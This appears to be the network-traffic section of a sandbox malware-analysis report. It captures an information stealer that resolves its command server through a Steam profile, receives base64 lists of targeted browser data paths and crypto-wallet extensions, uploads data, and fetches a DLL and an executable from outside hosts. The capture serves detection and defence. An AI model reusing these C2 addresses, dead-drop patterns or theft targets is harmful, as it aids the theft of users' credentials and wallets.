                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                            Oct 3, 2024 03:26:42.392971039 CEST1.1.1.1192.168.2.90x5425No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false

                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                            • steamcommunity.com
                                                                                                                                                                            • 49.12.197.9
                                                                                                                                                                            • 147.45.44.104

                                                                                                                                                                            HTTP Packets

                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            0192.168.2.949735147.45.44.104801420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Oct 3, 2024 03:27:25.089828014 CEST183OUTGET /ldms/a43486128347.exe HTTP/1.1
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 147.45.44.104
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Oct 3, 2024 03:27:25.798827887 CEST314INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:25 GMT
                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                            Content-Length: 13
                                                                                                                                                                            Last-Modified: Thu, 03 Oct 2024 01:25:21 GMT
                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                            Keep-Alive: timeout=120
                                                                                                                                                                            ETag: "66fdf281-d"
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Data Raw: 55 6e 6b 6e 6f 77 6e 20 65 72 72 6f 72
                                                                                                                                                                            Data Ascii: Unknown error


                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            0192.168.2.949711104.102.49.2544431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:26:43 UTC119OUTGET /profiles/76561199780418869 HTTP/1.1
                                                                                                                                                                            Host: steamcommunity.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:26:43 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:26:43 GMT
                                                                                                                                                                            Content-Length: 34879
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Set-Cookie: sessionid=eeeb706698cee978f709a32b; Path=/; Secure; SameSite=None
                                                                                                                                                                            Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                            2024-10-03 01:26:43 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                            2024-10-03 01:26:44 UTC16384INData Raw: 52 54 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34
                                                                                                                                                                            Data Ascii: RT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4
                                                                                                                                                                            2024-10-03 01:26:44 UTC3768INData Raw: 75 6d 6d 61 72 79 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72
                                                                                                                                                                            Data Ascii: ummary"></div><div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><scr
                                                                                                                                                                            2024-10-03 01:26:44 UTC213INData Raw: 63 6b 3d 22 52 65 73 70 6f 6e 73 69 76 65 5f 52 65 71 75 65 73 74 4d 6f 62 69 6c 65 56 69 65 77 28 29 22 3e 0d 0a 09 09 09 09 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                            Data Ascii: ck="Responsive_RequestMobileView()"><span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            1192.168.2.94971249.12.197.94431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:26:45 UTC184OUTGET / HTTP/1.1
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:26:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:26:45 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-10-03 01:26:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            2192.168.2.94971349.12.197.94431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:26:46 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAEC
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 256
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:26:46 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 49 4a 44 48 43 41 4b 4b 46 43 42 47 43 42 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 45 41 44 38 41 43 35 45 31 33 31 30 31 39 36 39 33 31 36 33 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 44 48 43 41 4b 4b 46 43 42 47 43 42 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 37 34 65 66 30 64 38 63 65 35 36 65 34 39 34 62 30 64 38 33 65 31 64 35 62 65 39 64 62 65 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 44 48 43 41 4b 4b 46 43 42 47 43 42 41 41 45 43 2d 2d 0d
                                                                                                                                                                            Data Ascii: ------EHIJDHCAKKFCBGCBAAECContent-Disposition: form-data; name="hwid"77EAD8AC5E131019693163-a33c7340-61ca------EHIJDHCAKKFCBGCBAAECContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------EHIJDHCAKKFCBGCBAAEC--
                                                                                                                                                                            2024-10-03 01:26:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:26:46 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-10-03 01:26:46 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 37 39 31 39 62 62 38 31 37 64 31 36 65 66 66 35 65 64 35 30 34 31 66 31 39 32 33 65 33 64 62 33 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 3a1|1|1|1|7919bb817d16eff5ed5041f1923e3db3|1|1|1|0|0|50000|10


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            3192.168.2.94971449.12.197.94431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:26:47 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJ
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:26:47 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 39 31 39 62 62 38 31 37 64 31 36 65 66 66 35 65 64 35 30 34 31 66 31 39 32 33 65 33 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 37 34 65 66 30 64 38 63 65 35 36 65 34 39 34 62 30 64 38 33 65 31 64 35 62 65 39 64 62 65 62 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                            Data Ascii: ------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------IJKFHDBKFCAAECBFIDHJCont
                                                                                                                                                                            2024-10-03 01:26:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:26:48 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-10-03 01:26:48 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                            Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            4192.168.2.94971549.12.197.94431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:26:49 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAF
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:26:49 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 39 31 39 62 62 38 31 37 64 31 36 65 66 66 35 65 64 35 30 34 31 66 31 39 32 33 65 33 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 37 34 65 66 30 64 38 63 65 35 36 65 34 39 34 62 30 64 38 33 65 31 64 35 62 65 39 64 62 65 62 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 0d 0a 43 6f 6e 74
                                                                                                                                                                            Data Ascii: ------FHCAEGCBFHJDGCBFHDAFContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------FHCAEGCBFHJDGCBFHDAFContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------FHCAEGCBFHJDGCBFHDAFCont
                                                                                                                                                                            2024-10-03 01:26:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:26:49 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-10-03 01:26:49 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                            Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            5192.168.2.94971649.12.197.94431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:26:50 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAF
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 332
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:26:50 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 39 31 39 62 62 38 31 37 64 31 36 65 66 66 35 65 64 35 30 34 31 66 31 39 32 33 65 33 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 37 34 65 66 30 64 38 63 65 35 36 65 34 39 34 62 30 64 38 33 65 31 64 35 62 65 39 64 62 65 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74
                                                                                                                                                                            Data Ascii: ------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------JDBFIIEBGCAKKEBFBAAFCont
                                                                                                                                                                            2024-10-03 01:26:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:26:51 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-10-03 01:26:51 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            6192.168.2.94971749.12.197.94431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:26:51 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAE
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 6897
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:26:51 UTC6897OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 39 31 39 62 62 38 31 37 64 31 36 65 66 66 35 65 64 35 30 34 31 66 31 39 32 33 65 33 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 37 34 65 66 30 64 38 63 65 35 36 65 34 39 34 62 30 64 38 33 65 31 64 35 62 65 39 64 62 65 62 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74
                                                                                                                                                                            Data Ascii: ------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------AKEGDAKEHJDHIDHJJDAECont
                                                                                                                                                                            2024-10-03 01:26:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:26:52 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-10-03 01:26:52 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            7192.168.2.94971849.12.197.94431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:26:53 UTC192OUTGET /sqlp.dll HTTP/1.1
